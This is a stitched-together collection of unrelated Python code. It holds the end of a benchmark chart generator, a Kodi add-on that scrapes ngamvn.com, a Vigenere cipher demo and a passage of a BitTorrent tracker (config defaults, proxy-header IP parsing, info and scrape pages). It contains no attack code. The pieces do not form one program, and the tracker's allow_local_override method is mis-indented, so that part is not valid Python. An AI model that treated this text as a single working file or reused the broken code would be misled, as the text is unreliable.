        for messages in sortedKeys(messagesMap):
            v2 = []
            v2.append("'" + str(messages) + "'")
            vc = ['Messages']
            for name in sortedKeys(loggerMap):
                key = name + '_' + str(threads) + '_' + str(messages)
                avg = sum(timeMap[key])/len(timeMap[key])
                v2.append('%.2f' % (float(messages) / avg))
                # into ms
                #v2.append('%.2f' % (1000 * gcMap[key]))
                vc.append(name)
            v.append('[' + ( ','.join(v2)) + ']')
        # NOTE(review): this assignment is immediately overwritten below.
        logger_names = ','.join(vc)
        logger_names = '';
        for i in range(0, len(vc)):
            # first column is the message-count label (string), rest are numbers
            type = 'number'
            if i == 0:
                type = 'string'
            logger_names = "%s\n\
            data.addColumn('%s', '%s');" % (logger_names, type, vc[i])
        chartname = 'throughput_%s_chart' % t
        charts.append(chartname)
        jswriter.write("\t/********* %s %s **************/ \n\
    //throughput \n\
    data = new google.visualization.DataTable(); \n\
    %s \n\
    data.addRows([ \n\
    %s\n\
    ]); \n\
    \n\
    chart = new google.visualization.LineChart(document.getElementById('%s')); \n\
    chart.draw(data, \n\
    { \n\
    width: %d, height: %d, \n\
    title: 'Throughput, %s %s', \n\
    hAxis: {title: 'number of messages', titleTextStyle: {color: '#000'}, logScale: true}, \n\
    vAxis: {title: 'messages / ms', gridlines: {color: '#ccc', count: 8}}, \n\
    legend: {position: 'right', textStyle: {color: 'black', fontSize: 10}}, \n\
    colors: [%s]\n\
    });\n\
    " % (ts, tname, logger_names, ',\n\t\t\t'.join(v), chartname, width, height, ts, tname, ','.join(colors)))
        # GC data rows for the same thread count
        v = []
        for messages in sortedKeys(messagesMap):
            v2 = []
            v2.append("'" + str(messages) + "'")
            vc = ['Messages']
            for name in sortedKeys(loggerMap):
                key = name + '_' + str(threads) + '_' + str(messages)
                #v2.append('%.2f' % (float(messages) / timeMap[key]))
                # into ms
                avg = sum(gcMap[key])/len(gcMap[key])
                v2.append('%.2f' % (1000 * avg))
                vc.append(name)
            v.append('[' + ( ','.join(v2)) + ']')
        logger_names = '';
        for i in range(0, len(vc)):
            type = 'number'
            if i == 0:
                type = 'string'
            logger_names = "%s\n\
            data.addColumn('%s', '%s');" % (logger_names, type, vc[i])
        chartname = 'gc_%s_chart' % t
        charts.append(chartname)
        jswriter.write("//gc \n\
    data = new google.visualization.DataTable(); \n\
    %s\n\
    data.addRows([ \n\
    %s \n\
    ]); \n\
    \n\
    chart = new google.visualization.LineChart(document.getElementById('%s'));\n\
    chart.draw(data, \n\
    {\n\
    width: %d, height: %d,\n\
    title: 'Total stop the world, %s %s',\n\
    hAxis: {title: 'number of messages', titleTextStyle: {color: '#000'}, logScale: true},\n\
    vAxis: {title: 'ms', gridlines: {color: '#ccc', count: 8}},\n\
    legend: {position: 'right', textStyle: {color: 'black', fontSize: 10}},\n\
    colors: [%s]\n\
    });\n" % (logger_names, ',\n\t\t\t'.join(v), chartname, width, height, ts, tname, ','.join(colors)))
    jswriter.write('}\n')
    # Emit the HTML shell: one <div> per chart plus the Google JSAPI loader.
    htmlwriter.write('<html>\n\
    <body>\n\
    <div id="chart"></div>\n\
    %s\n\
    <script type="text/javascript" src="https://www.google.com/jsapi"></script>\n\
    <script type="text/javascript" src="%s"></script>\n\
    <script type="text/javascript">\n\
    google.load("visualization", "1", {packages:["imagelinechart", "imagechart", "corechart"]});\n\
    google.setOnLoadCallback(drawChart);\n\
    </script>\n\
    </body> \n\
    </html>\n' % ( "\n".join(map(lambda c: '<div id="%s"></div>' % c, charts)), jsname ) )
    jswriter.close()
    htmlwriter.close()
|
import sys
import urllib
import urlparse
import xbmcgui
import xbmcplugin
import xbmcaddon
import xbmc
import requests
from bs4 import BeautifulSoup
from lib import CMDTools
# Kodi invocation: argv[0] is this plugin's base plugin:// URL.
base_url = sys.argv[0]
web_name="NGAMVN.COM"  # site display name (also used as the 'web' routing key)
web_url = "http://www.ngamvn.com/"  # base URL of the site being scraped
def get_Web_Name():
    """Return the display name of the site handled by this module."""
    return web_name
def get_img_thumb_url():
    """Return the addon-local path of this site's thumbnail image."""
    return CMDTools.get_path_img('resources/media/ngamvn.png')
def view():
    """Kodi entry point for the NGAMVN.COM scraper.

    Depending on the query-string arguments in sys.argv[2]:
    - 'url'  -> fetch the item page and either play its embedded YouTube
      video or show its image;
    - no 'cat' -> list the catalogue menu;
    - 'cat' (+ optional 'page') -> list one page of thumbnails plus a
      "Next" pagination entry.
    Labels below are UTF-8 byte escapes decoded to unicode (Python 2).
    """
    catalogues=[{'label':'Clip','id':'/list/pl/clip/'},
        {'label':'Home','id':'/list/home/'},
        {'label':"\x4D\xE1\xBB\x9B\x69\x20\x6E\x68\xE1\xBA\xA5\x74".decode('utf-8'),'id':'/list/new/'},
        {'label':'\x42\xC3\xAC\x6E\x68\x20\x63\x68\xE1\xBB\x8D\x6E'.decode('utf-8'),'id':'/list/vote/'},
        {'label':'\xE1\xBA\xA2\x6E\x68\x20\xC4\x91\x61\x6E\x67\x20\x68\x6F\x74'.decode('utf-8'),'id':'/list/hot/'},
        {'cat':'anh-vui-anh-che','label':'\xE1\xBA\xA2\x6E\x68\x20\x56\x75\x69\x20\x2D\x20\xE1\xBA\xA2\x6E\x68\x20\x43\x68\xE1\xBA\xBF'.decode('utf-8'),'id':'/list/pl/anh-vui-anh-che/'},
        {'label':'\xE1\xBA\xA2\x6E\x68\x20\x47\x69\x72\x6C'.decode('utf-8'),'id':'/list/pl/anh-girl/'}]
    addon_handle = int(sys.argv[1])
    addon = xbmcaddon.Addon()
    addonname = addon.getAddonInfo('name')
    args = urlparse.parse_qs(sys.argv[2][1:])
    xbmcplugin.setContent(addon_handle, 'movies')
    # cat: catalogue id; page: page number; url: address of the item page
    cat = args.get('cat', None)
    mode = args.get('mode', None)
    page = args.get('page', None)
    urlLink = args.get('url', None)
    url=web_url
    # The user clicked an item link: play video or show picture.
    if urlLink != None:
        response = requests.get(urlLink[0])
        html = response.text
        soup = BeautifulSoup(html)
        imgDiv=soup.find("div", attrs = {"class":"photoImg"})
        videoSrc=imgDiv.find("iframe")
        if videoSrc!=None:
            # iframe present: extract the YouTube id between the last '/' and '?'
            src=videoSrc.get("src")
            id1=src.rfind('/')+1
            id2=src.rfind('?')-len(src)
            src=src[id1:id2]
            #xbmc.log(src)
            xbmc.Player().play("plugin://plugin.video.youtube/play/?video_id="+src)
        else:
            imgSrc=imgDiv.find("img").get("src")
            xbmc.executebuiltin('ShowPicture('+web_url+imgSrc+')')
        return
    # No catalogue chosen yet: show the catalogue menu.
    if cat==None:
        for c in catalogues:
            li = xbmcgui.ListItem(c['label'])
            urlList = CMDTools.build_url(base_url,{'web':get_Web_Name(), 'cat':c['id']})
            xbmcplugin.addDirectoryItem(handle=addon_handle, url=urlList, listitem=li, isFolder=True)
        return
    # Load the content of the selected catalogue page.
    else:
        # Build the page URL.
        if page != None:
            page=int(page[0])
        else:
            page=1
        url=web_url+cat[0]+str(page)
        # Fetch and parse the page.
        response = requests.get(url)
        html = response.text
        soup = BeautifulSoup(html)
        divImgs=soup.findAll("div", attrs = {"class":"pic"})
        # Create one list item per thumbnail.
        for divItem in divImgs:
            #xbmc.log(divItem.encode('utf-8'))
            url_Item_Link=divItem.find("a").get("href")
            url_Item_Thumb=divItem.find("img", attrs = {"class":"thumb"}).get("src")
            url_Item_Label=divItem.find("img", attrs = {"class":"thumb"}).get("alt")
            if url_Item_Link!=None and url_Item_Thumb!=None:
                if(url_Item_Thumb.startswith("http://")!=True):
                    url_Item_Thumb=web_url+url_Item_Thumb
                li = xbmcgui.ListItem(url_Item_Label.encode('utf-8'))
                li.setThumbnailImage(url_Item_Thumb)
                urlList=CMDTools.build_url(base_url,{'web':web_name,'url': url_Item_Link.encode('utf-8')});
                xbmcplugin.addDirectoryItem(handle=addon_handle , url=urlList, listitem=li)
        # "Next" button for pagination.
        li = xbmcgui.ListItem("Next")
        urlList=CMDTools.build_url(base_url,{'web':web_name, 'cat':cat[0],'page': page+1});
        xbmcplugin.addDirectoryItem(handle=addon_handle, url=urlList, listitem=li, isFolder=True)
|
def encrypt(text, key, alphabet):
    """Vigenere-encrypt *text* with *key* over *alphabet*.

    Letter case is preserved. Characters whose lowercase form is not in
    *alphabet* pass through unchanged — but note they still advance the
    key position, because the key index is the absolute position in
    *text* (this matches the original implementation).
    """
    key_len = len(key)
    # row k of the tableau is the alphabet rotated left by k
    rows = [alphabet[off:] + alphabet[:off] for off in range(len(alphabet))]
    pieces = []
    for pos, ch in enumerate(text):
        low = ch.lower()
        if low not in alphabet:
            pieces.append(ch)
            continue
        row_idx = alphabet.index(key[pos % key_len].lower())
        enc = rows[row_idx][alphabet.index(low)]
        pieces.append(enc if ch == low else enc.upper())
    return "".join(pieces)
def decrypt(text, key, alphabet):
    """Invert encrypt(): Vigenere-decrypt *text* with *key* over *alphabet*.

    Letter case is preserved; characters outside *alphabet* pass through
    unchanged but still advance the key position (absolute index in
    *text*), mirroring encrypt().
    """
    key_len = len(key)
    rows = [alphabet[off:] + alphabet[:off] for off in range(len(alphabet))]
    pieces = []
    for pos, ch in enumerate(text):
        low = ch.lower()
        if low not in alphabet:
            pieces.append(ch)
            continue
        row = rows[alphabet.index(key[pos % key_len].lower())]
        plain = alphabet[row.index(low)]
        pieces.append(plain if ch == low else plain.upper())
    return "".join(pieces)
def test_cipher(text, key, alphabet = "abcdefghijklmnopqrstuvwxyz"):
    """Round-trip *text* through encrypt/decrypt with *key* and print the result.

    Fixes: the previous version ignored its *text* and *key* arguments and
    always encrypted the literal "Hello" with key "Hi"; the printed message
    also read "back it" instead of "back to".
    """
    ciphertext = encrypt(text, key, alphabet)
    plaintext = decrypt(ciphertext, key, alphabet)
    print("Got plaintext: \"{}\", encrypted it to \"{}\", then decrypted it back to \"{}\"".format(text, ciphertext, plaintext))
if __name__ == "__main__":
    # Demo: round-trip a sample message through the cipher.
    sample_key = "Hi"
    sample_text = "Hello"
    test_cipher(sample_text, sample_key)
|
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Bram Cohen and John Hoffman
import sys
import os
import signal
import re
from threading import Event
from urlparse import urlparse
from traceback import print_exc
from time import time, gmtime, strftime, localtime
from random import shuffle
from types import StringType, IntType, LongType, ListType, DictType
from binascii import b2a_hex
from cStringIO import StringIO
from BitTorrent.obsoletepythonsupport import *
from BitTorrent.parseargs import parseargs, formatDefinitions
from BitTorrent.RawServer_magic import RawServer
from BitTorrent.HTTPHandler import HTTPHandler, months, weekdays
from BitTorrent.parsedir import parsedir
from BitTorrent.NatCheck import NatCheck
from BitTorrent.bencode import bencode, bdecode, Bencached
from BitTorrent.zurllib import quote, unquote
from BitTorrent import version
# Tracker configuration options as (name, default, help-text) triples,
# consumed by BitTorrent.parseargs.parseargs/formatDefinitions. Help text
# is wrapped in the gettext `_()` marker.
defaults = [
    ('port', 80,
        _("Port to listen on.")),
    ('dfile', None,
        _("file to store recent downloader info in")),
    ('bind', '',
        _("ip to bind to locally")),
    ('socket_timeout', 15,
        _("timeout for closing connections")),
    ('close_with_rst', 0,
        _("close connections with RST and avoid the TCP TIME_WAIT state")),
    ('save_dfile_interval', 5 * 60,
        _("seconds between saving dfile")),
    ('timeout_downloaders_interval', 45 * 60,
        _("seconds between expiring downloaders")),
    ('reannounce_interval', 30 * 60,
        _("seconds downloaders should wait between reannouncements")),
    ('response_size', 50,
        _("default number of peers to send an info message to if the "
          "client does not specify a number")),
    ('timeout_check_interval', 5,
        _("time to wait between checking if any connections have timed out")),
    ('nat_check', 3,
        _("how many times to check if a downloader is behind a NAT "
          "(0 = don't check)")),
    ('log_nat_checks', 0,
        _("whether to add entries to the log for nat-check results")),
    ('min_time_between_log_flushes', 3.0,
        _("minimum time it must have been since the last flush to do "
          "another one")),
    ('min_time_between_cache_refreshes', 600.0,
        _("minimum time in seconds before a cache is considered stale "
          "and is flushed")),
    ('allowed_dir', '',
        _("only allow downloads for .torrents in this dir (and recursively in "
          "subdirectories of directories that have no .torrent files "
          "themselves). If set, torrents in this directory show up on "
          "infopage/scrape whether they have peers or not")),
    ('parse_dir_interval', 60,
        _("how often to rescan the torrent directory, in seconds")),
    ('allowed_controls', 0,
        _("allow special keys in torrents in the allowed_dir to affect "
          "tracker access")),
    ('hupmonitor', 0,
        _("whether to reopen the log file upon receipt of HUP signal")),
    ('show_infopage', 1,
        _("whether to display an info page when the tracker's root dir "
          "is loaded")),
    ('infopage_redirect', '',
        _("a URL to redirect the info page to")),
    ('show_names', 1,
        _("whether to display names from allowed dir")),
    ('favicon', '',
        _("file containing x-icon data to return when browser requests "
          "favicon.ico")),
    ('only_local_override_ip', 2,
        _("ignore the ip GET parameter from machines which aren't on "
          "local network IPs (0 = never, 1 = always, 2 = ignore if NAT "
          "checking is not enabled). HTTP proxy headers giving address "
          "of original client are treated the same as --ip.")),
    ('logfile', '',
        _("file to write the tracker logs, use - for stdout (default)")),
    ('allow_get', 0,
        _("use with allowed_dir; adds a /file?hash={hash} url that "
          "allows users to download the torrent file")),
    ('keep_dead', 0,
        _("keep dead torrents after they expire (so they still show up on your "
          "/scrape and web page). Only matters if allowed_dir is not set")),
    ('scrape_allowed', 'full',
        _("scrape access allowed (can be none, specific or full)")),
    ('max_give', 200,
        _("maximum number of peers to give with any one request")),
    ('max_incomplete', 100,
        _("max number of outgoing incomplete connections")),
    ('twisted', -1,
        _("Use Twisted network libraries for network connections. 1 means use twisted, 0 means do not use twisted, -1 means autodetect, and prefer twisted")),
    ('pid', '/var/run/bittorrent-tracker.pid',
        "Path to PID file")
    ]
def statefiletemplate(x):
    """Validate the structure of a decoded tracker state file.

    *x* must be a dict; the recognized sections are 'peers', 'completed',
    'allowed' and 'allowed_dir_files'. Raises ValueError on any structural
    violation. Uses Python 2 type objects (DictType, StringType, IntType,
    LongType) and dict.has_key, so this is Python-2-only code.
    """
    if type(x) != DictType:
        raise ValueError
    for cname, cinfo in x.items():
        if cname == 'peers':
            for y in cinfo.values():      # The 'peers' key is a dictionary of SHA hashes (torrent ids)
                if type(y) != DictType:   # ... for the active torrents, and each is a dictionary
                    raise ValueError
                for peerid, info in y.items(): # ... of client ids interested in that torrent
                    if (len(peerid) != 20):
                        raise ValueError
                    if type(info) != DictType:  # ... each of which is also a dictionary
                        raise ValueError # ... which has an IP, a Port, and a Bytes Left count for that client for that torrent
                    if type(info.get('ip', '')) != StringType:
                        raise ValueError
                    port = info.get('port')
                    if type(port) not in (IntType, LongType) or port < 0:
                        raise ValueError
                    left = info.get('left')
                    if type(left) not in (IntType, LongType) or left < 0:
                        raise ValueError
        elif cname == 'completed':
            if (type(cinfo) != DictType): # The 'completed' key is a dictionary of SHA hashes (torrent ids)
                raise ValueError          # ... for keeping track of the total completions per torrent
            for y in cinfo.values():      # ... each torrent has an integer value
                if type(y) not in (IntType,LongType):
                    raise ValueError      # ... for the number of reported completions for that torrent
        elif cname == 'allowed':
            if (type(cinfo) != DictType): # a list of info_hashes and included data
                raise ValueError
            if x.has_key('allowed_dir_files'):
                adlist = [z[1] for z in x['allowed_dir_files'].values()]
                for y in cinfo.keys():    # and each should have a corresponding key here
                    if not y in adlist:
                        raise ValueError
        elif cname == 'allowed_dir_files':
            if (type(cinfo) != DictType): # a list of files, their attributes and info hashes
                raise ValueError
            dirkeys = {}
            for y in cinfo.values():      # each entry should have a corresponding info_hash
                if not y[1]:
                    continue
                if not x['allowed'].has_key(y[1]):
                    raise ValueError
                if dirkeys.has_key(y[1]): # and each should have a unique info_hash
                    raise ValueError
                dirkeys[y[1]] = 1
# Body text returned with 404 responses for files this tracker doesn't know.
alas = _("your file may exist elsewhere in the universe\nbut alas, not here\n")
def isotime(secs = None):
    """Format *secs* (a UNIX timestamp; defaults to now) as 'YYYY-MM-DD HH:MM UTC'."""
    if secs is None:
        secs = time()
    return strftime('%Y-%m-%d %H:%M UTC', gmtime(secs))
# Matches the trailing " for <ip>" clause of an HTTP Via header.
# Fix: raw string — in a plain literal '\Z' is an invalid escape sequence
# (DeprecationWarning, a SyntaxWarning on Python 3.12+); the compiled
# pattern is byte-identical.
http_via_filter = re.compile(r' for ([0-9.]+)\Z')
def _get_forwarded_ip(headers):
    """Best-effort extraction of the originating client address from proxy headers.

    Checks, in order: X-Forwarded-For, Client-IP, Via, From (as lowercased
    'http_*' keys). Returns the raw header-derived string or None.
    For X-Forwarded-For with exactly one comma, prefers the non-local of
    the two addresses; otherwise returns the header verbatim.
    """
    forwarded = headers.get('http_x_forwarded_for')
    if forwarded is not None:
        try:
            first, second = forwarded.split(',')
        except Exception:
            # zero or several commas (or odd header value): return as-is
            return forwarded
        return second if is_local_ip(first) else first
    if 'http_client_ip' in headers:
        return headers['http_client_ip']
    if 'http_via' in headers:
        match = http_via_filter.search(headers['http_via'])
        if match is not None:
            return match.group(1)
    if 'http_from' in headers:
        return headers['http_from']
    return None
def get_forwarded_ip(headers):
    """Return the proxied client IP from *headers*, or None if it is absent,
    not a valid dotted quad, or a local/private address."""
    candidate = _get_forwarded_ip(headers)
    if candidate is None:
        return None
    if not is_valid_ipv4(candidate) or is_local_ip(candidate):
        return None
    return candidate
def compact_peer_info(ip, port):
    """Encode a dotted-quad *ip* and *port* in the 6-byte 'compact' peer format.

    Returns '' when *ip* is not a dotted quad (e.g. a hostname) or the
    encoding does not come out to exactly 6 characters.
    """
    try:
        packed = ''.join(chr(int(octet)) for octet in ip.split('.'))
        packed += chr((port & 0xFF00) >> 8) + chr(port & 0xFF)
    except:
        return ''  # not a valid IP, must be a domain name
    return packed if len(packed) == 6 else ''
def is_valid_ipv4(ip):
    """Return True if *ip* looks like a dotted quad of numeric fields.

    Range checking mirrors the original chr(int(x)) trick: a field that
    is non-numeric or out of chr()'s range raises and yields False.
    """
    fields = ip.split('.')
    if len(fields) != 4:
        return False
    try:
        for field in fields:
            chr(int(field))  # raises on non-numeric / out-of-range values
    except:
        return False
    return True
def is_local_ip(ip):
    """Return 1 if *ip* is in a private/loopback/link-local range, else 0.

    Recognized ranges: 10/8, 127/8, 192.168/16, 169.254/16 and 172.16/12.
    Non-numeric input returns 0.
    Fix: the previous version fell off the end (returning None) for valid
    public addresses while every other path returned 0 or 1; callers only
    test truthiness, so an explicit `return 0` is backward-compatible and
    makes the return type consistent.
    """
    try:
        v = [int(x) for x in ip.split('.')]
    except ValueError:
        return 0
    if v[0] == 10 or v[0] == 127 or v[:2] in ([192, 168], [169, 254]):
        return 1
    if v[0] == 172 and v[1] >= 16 and v[1] <= 31:
        return 1
    return 0
class Tracker(object):
    def __init__(self, config, rawserver):
        """Build tracker state from *config*, restore the saved state file
        (dfile) if present, and register periodic save/expire tasks on
        *rawserver*. Python 2 code (print statements, has_key)."""
        self.config = config
        self.response_size = config['response_size']
        self.max_give = config['max_give']
        self.dfile = config['dfile']
        self.natcheck = config['nat_check']
        favicon = config['favicon']
        self.favicon = None
        if favicon:
            try:
                h = open(favicon,'r')
                self.favicon = h.read()
                h.close()
            except:
                print _("**warning** specified favicon file -- %s -- does not exist.") % favicon
        self.rawserver = rawserver
        self.cached = {}    # format: infohash: [[time1, l1, s1], [time2, l2, s2], [time3, l3, s3]]
        self.cached_t = {}  # format: infohash: [time, cache]
        self.times = {}
        self.state = {}
        self.seedcount = {}
        self.only_local_override_ip = config['only_local_override_ip']
        if self.only_local_override_ip == 2:
            # mode 2 = "auto": honor overrides only when NAT checking is off
            self.only_local_override_ip = not config['nat_check']
        if os.path.exists(self.dfile):
            # Restore previously saved peer state; any error resets to empty.
            try:
                h = open(self.dfile, 'rb')
                ds = h.read()
                h.close()
                tempstate = bdecode(ds)
                if not tempstate.has_key('peers'):
                    # legacy format: the whole file was the peers dict
                    tempstate = {'peers': tempstate}
                statefiletemplate(tempstate)
                self.state = tempstate
            except:
                print _("**warning** statefile %s corrupt; resetting") % \
                    self.dfile
        self.downloads = self.state.setdefault('peers', {})
        self.completed = self.state.setdefault('completed', {})
        self.becache = {}   # format: infohash: [[l1, s1], [l2, s2], [l3, s3]]
        # Rebuild seed counts and NAT-check caches from the restored peers.
        for infohash, ds in self.downloads.items():
            self.seedcount[infohash] = 0
            for x,y in ds.items():
                if not y.get('nat',-1):
                    ip = y.get('given_ip')
                    if not (ip and self.allow_local_override(y['ip'], ip)):
                        ip = y['ip']
                    self.natcheckOK(infohash,x,ip,y['port'],y['left'])
                if not y['left']:
                    self.seedcount[infohash] += 1
        for infohash in self.downloads:
            self.times[infohash] = {}
            for peerid in self.downloads[infohash]:
                self.times[infohash][peerid] = 0
        self.reannounce_interval = config['reannounce_interval']
        self.save_dfile_interval = config['save_dfile_interval']
        self.show_names = config['show_names']
        rawserver.add_task(self.save_dfile, self.save_dfile_interval)
        self.prevtime = time()
        self.timeout_downloaders_interval = config['timeout_downloaders_interval']
        rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval)
        self.logfile = None
        self.log = None
        # Optionally redirect stdout to the configured log file.
        if (config['logfile'] != '') and (config['logfile'] != '-'):
            try:
                self.logfile = config['logfile']
                self.log = open(self.logfile,'a')
                sys.stdout = self.log
                print _("# Log Started: "), isotime()
            except:
                print _("**warning** could not redirect stdout to log file: "), sys.exc_info()[0]
        if config['hupmonitor']:
            # SIGHUP handler: reopen the log file (for log rotation).
            def huphandler(signum, frame, self = self):
                try:
                    self.log.close ()
                    self.log = open(self.logfile,'a')
                    sys.stdout = self.log
                    print _("# Log reopened: "), isotime()
                except:
                    print _("**warning** could not reopen logfile")
            signal.signal(signal.SIGHUP, huphandler)
        self.allow_get = config['allow_get']
        if config['allowed_dir'] != '':
            self.allowed_dir = config['allowed_dir']
            self.parse_dir_interval = config['parse_dir_interval']
            self.allowed = self.state.setdefault('allowed',{})
            self.allowed_dir_files = self.state.setdefault('allowed_dir_files',{})
            self.allowed_dir_blocked = {}
            self.parse_allowed()
        else:
            # No allowed_dir: drop any stale allowed-state sections.
            try:
                del self.state['allowed']
            except:
                pass
            try:
                del self.state['allowed_dir_files']
            except:
                pass
            self.allowed = None
        # Detect urllib unquote behavior for '+' (differs across versions).
        self.uq_broken = unquote('+') != ' '
        self.keep_dead = config['keep_dead']
def allow_local_override(self, ip, given_ip):
return is_valid_ipv4(given_ip) and (
not self.only_local_override_ip or is_local_ip(ip) )
    def get_infopage(self):
        """Render the tracker's HTML status page.

        Returns an HTTP response tuple (code, message, headers, body).
        Honors the show_infopage and infopage_redirect config options;
        lists per-torrent complete/downloading/downloaded counts, plus
        name/size/transferred columns when an allowed dir with names is
        configured. Any exception is caught and returned as a 500.
        """
        try:
            if not self.config['show_infopage']:
                return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
            red = self.config['infopage_redirect']
            if red != '':
                return (302, 'Found', {'Content-Type': 'text/html', 'Location': red},
                        '<A HREF="'+red+'">Click Here</A>')
            s = StringIO()
            s.write('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">\n' \
                '<html><head><title>BitTorrent download info</title>\n')
            if self.favicon is not None:
                s.write('<link rel="shortcut icon" href="/favicon.ico">\n')
            s.write('</head>\n<body>\n' \
                '<h3>BitTorrent download info</h3>\n'\
                '<ul>\n'
                '<li><strong>tracker version:</strong> %s</li>\n' \
                '<li><strong>server time:</strong> %s</li>\n' \
                '</ul>\n' % (version, isotime()))
            # Build the (name, infohash) list to display: allowed torrents
            # when an allowed_dir is configured, otherwise tracked ones.
            if self.allowed is not None:
                if self.show_names:
                    names = [ (value['name'], infohash)
                              for infohash, value in self.allowed.iteritems()]
                else:
                    names = [(None, infohash) for infohash in self.allowed]
            else:
                names = [ (None, infohash) for infohash in self.downloads]
            if not names:
                s.write('<p>not tracking any files yet...</p>\n')
            else:
                names.sort()
                tn = 0
                tc = 0
                td = 0
                tt = 0 # Total transferred
                ts = 0 # Total size
                nf = 0 # Number of files displayed
                if self.allowed is not None and self.show_names:
                    s.write('<table summary="files" border="1">\n' \
                        '<tr><th>info hash</th><th>torrent name</th><th align="right">size</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th><th align="right">transferred</th></tr>\n')
                else:
                    s.write('<table summary="files">\n' \
                        '<tr><th>info hash</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th></tr>\n')
                for name, infohash in names:
                    l = self.downloads[infohash]
                    n = self.completed.get(infohash, 0)
                    tn = tn + n
                    c = self.seedcount[infohash]
                    tc = tc + c
                    d = len(l) - c
                    td = td + d
                    nf = nf + 1
                    if self.allowed is not None and self.show_names:
                        if self.allowed.has_key(infohash):
                            sz = self.allowed[infohash]['length'] # size
                            ts = ts + sz
                            szt = sz * n # Transferred for this torrent
                            tt = tt + szt
                            if self.allow_get == 1:
                                linkname = '<a href="/file?info_hash=' + quote(infohash) + '">' + name + '</a>'
                            else:
                                linkname = name
                            s.write('<tr><td><code>%s</code></td><td>%s</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td><td align="right">%s</td></tr>\n' \
                                % (b2a_hex(infohash), linkname, size_format(sz), c, d, n, size_format(szt)))
                    else:
                        s.write('<tr><td><code>%s</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td></tr>\n' \
                            % (b2a_hex(infohash), c, d, n))
                # Totals row.
                ttn = 0
                for i in self.completed.values():
                    ttn = ttn + i
                if self.allowed is not None and self.show_names:
                    s.write('<tr><td align="right" colspan="2">%i files</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i/%i</td><td align="right">%s</td></tr>\n'
                            % (nf, size_format(ts), tc, td, tn, ttn, size_format(tt)))
                else:
                    s.write('<tr><td align="right">%i files</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i/%i</td></tr>\n'
                            % (nf, tc, td, tn, ttn))
                s.write('</table>\n' \
                    '<ul>\n' \
                    '<li><em>info hash:</em> SHA1 hash of the "info" section of the metainfo (*.torrent)</li>\n' \
                    '<li><em>complete:</em> number of connected clients with the complete file</li>\n' \
                    '<li><em>downloading:</em> number of connected clients still downloading</li>\n' \
                    '<li><em>downloaded:</em> reported complete downloads (total: current/all)</li>\n' \
                    '<li><em>transferred:</em> torrent size * total downloaded (does not include partial transfers)</li>\n' \
                    '</ul>\n')
            s.write('</body>\n' \
                '</html>\n')
            return (200, 'OK', {'Content-Type': 'text/html; charset=iso-8859-1'}, s.getvalue())
        except:
            print_exc()
            return (500, 'Internal Server Error', {'Content-Type': 'text/html; charset=iso-8859-1'}, 'Server Error')
def scrapedata(self, infohash, return_name = True):
    """Build the scrape dictionary for a single torrent.

    Returns a dict with 'complete' (connected seeds), 'incomplete'
    (connected leechers) and 'downloaded' (reported completed downloads);
    the torrent name is included only when names are shown and an
    allowed-list entry exists.
    """
    peers = self.downloads[infohash]
    complete = self.seedcount[infohash]
    result = {'complete': complete,
              'incomplete': len(peers) - complete,
              'downloaded': self.completed.get(infohash, 0)}
    if return_name and self.show_names and self.allowed is not None:
        result['name'] = self.allowed[infohash]['name']
    return result
def get_scrape(self, paramslist):
    """Handle a /scrape request.

    With 'info_hash' parameters, scrape only those torrents (requires
    scrape_allowed in {'specific', 'full'}); otherwise scrape everything
    (requires scrape_allowed == 'full').
    """
    fs = {}
    if 'info_hash' in paramslist:
        # Per-torrent scrape.
        if self.config['scrape_allowed'] not in ['specific', 'full']:
            return (400, 'Not Authorized',
                    {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                    bencode({'failure reason':
                             _("specific scrape function is not available with this tracker.")}))
        for infohash in paramslist['info_hash']:
            # Skip torrents not on the allowed list; report only known ones.
            if self.allowed is not None and infohash not in self.allowed:
                continue
            if infohash in self.downloads:
                fs[infohash] = self.scrapedata(infohash)
    else:
        # Full scrape of every tracked (or allowed) torrent.
        if self.config['scrape_allowed'] != 'full':
            return (400, 'Not Authorized',
                    {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                    bencode({'failure reason':
                             _("full scrape function is not available with this tracker.")}))
        if self.allowed is not None:
            hashes = self.allowed
        else:
            hashes = self.downloads
        for infohash in hashes:
            fs[infohash] = self.scrapedata(infohash)
    return (200, 'OK', {'Content-Type': 'text/plain'}, bencode({'files': fs}))
def get_file(self, infohash):
    """Serve the stored .torrent metainfo file for `infohash`.

    Returns an HTTP response tuple: 400 when downloads are disabled,
    404 when the torrent is unknown, otherwise 200 with the raw file.
    """
    if not self.allow_get:
        return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                _("get function is not available with this tracker."))
    if infohash not in self.allowed:
        return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
    fname = self.allowed[infohash]['file']
    fpath = self.allowed[infohash]['path']
    # Read via a context manager so the handle is closed even if read() fails
    # (the original open(...).read() leaked the descriptor on error).
    with open(fpath, 'rb') as f:
        data = f.read()
    return (200, 'OK', {'Content-Type': 'application/x-bittorrent',
                        'Content-Disposition': 'attachment; filename=' + fname},
            data)
def check_allowed(self, infohash, paramslist):
    """Return a bencoded failure response if this torrent may not use the
    tracker, or None when the announce is permitted."""
    if self.allowed is None:
        # No allowed-list configured: everything is permitted.
        return None
    if infohash not in self.allowed:
        return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                bencode({'failure reason':
                         _("Requested download is not authorized for use with this tracker.")}))
    if self.config['allowed_controls'] and 'failure reason' in self.allowed[infohash]:
        # Per-torrent control file supplied an explicit rejection message.
